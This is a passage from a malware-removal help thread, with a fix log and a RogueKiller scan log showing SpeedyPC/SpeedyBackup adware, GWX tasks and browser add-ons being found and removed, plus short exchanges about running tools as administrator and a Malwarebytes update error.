HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5840CBCE-7F77-411E-B033-1C1AF189ADB5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5840CBCE-7F77-411E-B033-1C1AF189ADB5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\1f308483-1a6e-493d-ae8f-5dd8634c5004-4 => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{69480AF7-F603-4EA8-8F93-EA6B8C01E138} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{69480AF7-F603-4EA8-8F93-EA6B8C01E138} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{766E1EC9-58D6-40FB-BAC5-6BD45B994FC5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{766E1EC9-58D6-40FB-BAC5-6BD45B994FC5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{89FF84C6-2FF3-4ADC-9311-2162837E1C22} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{89FF84C6-2FF3-4ADC-9311-2162837E1C22} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-URT => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{934CAF6C-AD19-40B5-8ACE-AC40D21BBF28} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{934CAF6C-AD19-40B5-8ACE-AC40D21BBF28} => key removed successfully
C:\WINDOWS\System32\Tasks\{0532BE32-87D9-B0CA-75BD-6DEE5839A94C} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0532BE32-87D9-B0CA-75BD-6DEE5839A94C} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A433E40E-B066-4216-A8FB-2E412069CE29} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A433E40E-B066-4216-A8FB-2E412069CE29} => key removed successfully
C:\WINDOWS\System32\Tasks\SpeedyBackup Startup => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpeedyBackup Startup => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B1619F2B-5CE9-4EC5-A3E5-FD048FF487E4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1619F2B-5CE9-4EC5-A3E5-FD048FF487E4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B7731159-01AA-4BAF-8508-D5D744AB61D2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B7731159-01AA-4BAF-8508-D5D744AB61D2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C6518B78-A01B-4FE6-8AF0-38C0BBF48E58} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6518B78-A01B-4FE6-8AF0-38C0BBF48E58} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SwiftSearch Auto Updater 1.10.0.25 Pending Update => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D6F2BC1F-773E-4624-9FAA-578BE389CD0E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D6F2BC1F-773E-4624-9FAA-578BE389CD0E} => key removed successfully
C:\WINDOWS\System32\Tasks\SpeedyBackup reigistration schedule => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpeedyBackup reigistration schedule => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E1DEA695-EE7F-4FB6-A4F0-EB278B1FD47B} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1DEA695-EE7F-4FB6-A4F0-EB278B1FD47B} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E6542D06-DBEF-4690-A07E-F59316EEB423} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E6542D06-DBEF-4690-A07E-F59316EEB423} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F2EF1CA8-784E-427A-A1D4-97AEB2EB4A85} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F2EF1CA8-784E-427A-A1D4-97AEB2EB4A85} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FA4F0A0E-8234-469C-B0EB-2375D63F521A} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA4F0A0E-8234-469C-B0EB-2375D63F521A} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Inst_Rep => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FFCE8EEA-7117-44A9-8BD4-0C6EA5CEE61E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FFCE8EEA-7117-44A9-8BD4-0C6EA5CEE61E} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key removed successfully
C:\WINDOWS\Tasks\NNKcNIsK9b1hl0VgyglYTRwSD.job => moved successfully
"C:\Users\Randy\AppData\Roaming\NNKcNIsK9b1hl0VgyglYTRwSD.exe" => not found.
C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job => moved successfully
"C:\Program Files (x86)\Common Files\SpeedyPC Software" => not found.
[2068] C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe => process closed successfully.
C:\Program Files (x86)\SpeedyPC Software => moved successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderNotSynced => key not found.
HKCR\CLSID\{4008A679-BE48-456D-A32E-97DE3F48E10D} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderSynced => key not found.
HKCR\CLSID\{4DD1429E-055B-4585-9E4D-614252FD7FC1} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileNotSynced => key not found.
HKCR\CLSID\{267973DC-2B3C-41CE-93F1-D2C5CCC06663} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileSynced => key not found.
HKCR\CLSID\{DBD42211-56CD-4C08-A3E4-48ED07AD7759} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderExcluded => key not found.
HKCR\CLSID\{43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderNotSynced => key not found.
HKCR\CLSID\{3E2576B1-5B08-47DE-8803-95C6ECA734EE} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderSynced => key not found.
HKCR\CLSID\{2858A960-566F-45CF-951E-4B3099E70E6F} => key not found.
HKLM\System\CurrentControlSet\Services\BackupService => key removed successfully
BackupService => service removed successfully
C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job => moved successfully
C:\WINDOWS\Tasks\SpeedyBackup Startup.job => moved successfully
"C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job" => not found.
C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job => moved successfully
C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job => not found.
C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job => not found.
C:\WINDOWS\Tasks\SpeedyBackup Startup.job => not found.

==== End of Fixlog 21:03:12 ====
 
Try to right-click on the installation file and then click "Run as an Administrator".
 
Now we are making some progress. I know I did the administrative load yesterday and it didn't work, but it did this time.
What is a beach kit?
RKill:

RogueKiller V12.9.7.0 (x64) [Feb 6 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.10586) 64 bits version
Started in : Normal mode
User : Randy [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 02/12/2017 16:10:13 (Duration : 00:41:57)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 27 ¤¤¤
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{267973DC-2B3C-41CE-93F1-D2C5CCC06663} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{2858A960-566F-45CF-951E-4B3099E70E6F} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{3E2576B1-5B08-47DE-8803-95C6ECA734EE} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{4008A679-BE48-456D-A32E-97DE3F48E10D} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{4A28BE8C-F5D8-4300-ADD9-9C764381121B} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{4DD1429E-055B-4585-9E4D-614252FD7FC1} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_CLASSES_ROOT\CLSID\{DBD42211-56CD-4C08-A3E4-48ED07AD7759} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) -> Not selected
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-2783097096-289569773-1546617986-1001\Software\SpeedyPC Software -> Not selected
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-2783097096-289569773-1546617986-1001\Software\SpeedyPC Software -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderNotSynced | (default) : {4008A679-BE48-456D-A32E-97DE3F48E10D} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderSynced | (default) : {4DD1429E-055B-4585-9E4D-614252FD7FC1} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileNotSynced | (default) : {267973DC-2B3C-41CE-93F1-D2C5CCC06663} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileSynced | (default) : {DBD42211-56CD-4C08-A3E4-48ED07AD7759} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderExcluded | (default) : {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderNotSynced | (default) : {3E2576B1-5B08-47DE-8803-95C6ECA734EE} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderSynced | (default) : {2858A960-566F-45CF-951E-4B3099E70E6F} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderNotSynced | (default) : {4008A679-BE48-456D-A32E-97DE3F48E10D} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderSynced | (default) : {4DD1429E-055B-4585-9E4D-614252FD7FC1} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileNotSynced | (default) : {267973DC-2B3C-41CE-93F1-D2C5CCC06663} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileSynced | (default) : {DBD42211-56CD-4C08-A3E4-48ED07AD7759} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderExcluded | (default) : {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderNotSynced | (default) : {3E2576B1-5B08-47DE-8803-95C6ECA734EE} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderSynced | (default) : {2858A960-566F-45CF-951E-4B3099E70E6F} (C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll) [x] -> Not selected
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {F65943E6-3AF8-4E73-A7B3-0B0E5F88AA10} : v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Randy\AppData\Local\Temp\7zS377E\HP.EasyStart.exe|Name=HP EasyStart|Desc=Allow HP EasyStart| [x] -> Not selected

¤¤¤ Tasks : 1 ¤¤¤
[Suspicious.Path] \Beach Kit -- C:\Windows\system32\rundll32.exe ("C:\Users\Randy\AppData\Local\Beach Kit\{B29DDEDA-90AD-4218-7C20-9BC475FF709E}\BeachKit.dll",#3) -> Not selected

¤¤¤ Files : 2 ¤¤¤
[PUP.Filefinder][Folder] C:\Program Files (x86)\Pluto TV -> Deleted
[PUP.Filefinder][Folder] C:\Program Files (x86)\Pluto TV\locales -> Deleted
[Tr.Gen0][File] C:\Users\Randy\Pictures\adwcleaner_3.310.exe -> Deleted

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 2 ¤¤¤
[PUP.Gen2][Firefox:Addon] w1n6vmjf.default : Video Resumer [videoresumer@jetpack] -> Not selected
[PUP.Gen2][Firefox:Addon] w1n6vmjf.default : Yahoo Toolbar [{635abd67-4fe9-1b23-4f01-e679fa7484c1}] -> Not selected

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: Hitachi HTS547550A9E384 SATA Disk Device +++++
--- User ---
[MBR] 77fa1d858a8c63e6b064e2d9215b3df4
[BSP] b9ef7629f0ffd11443ea4d917c936735 : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 199 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 409600 | Size: 455991 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 934279168 | Size: 20645 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
3 - [XXXXXX] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 976560128 | Size: 103 MB
User = LL1 ... OK
User = LL2 ... OK
 
Actually, Mbam loaded, but when I try to update it, I get an error message: Program Error Updating Host not found.
 